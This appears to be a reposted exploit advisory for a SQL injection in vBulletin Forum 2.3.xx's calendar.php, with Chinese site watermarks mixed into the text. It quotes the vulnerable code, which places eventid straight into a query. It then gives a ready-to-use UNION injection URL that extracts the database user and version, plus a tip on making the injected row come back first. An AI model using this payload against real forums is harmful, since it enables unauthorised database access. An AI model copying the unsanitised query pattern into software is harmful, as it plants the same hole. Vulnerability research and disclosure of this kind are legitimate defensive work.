——– Cut from line 585 in calendar.php ——–来源gaodai#ma#com搞@@代~&码网—
else if ($action == “edit”)
{
$eventinfo = $DB_site->query_first(“SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid”);
—————————————————–
If the MySQL version is greater than 4.00, a UNION attack could be used.
—————————————–
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,’0000-0-0′,user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
—————————————–
The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.
以上就是vBulletin Forum 2.3.xx SQL Injection的详细内容,更多请关注gaodaima搞代码网其它相关文章!
转载请注明原文链接:vBulletin Forum 2.3.xx SQL Injection
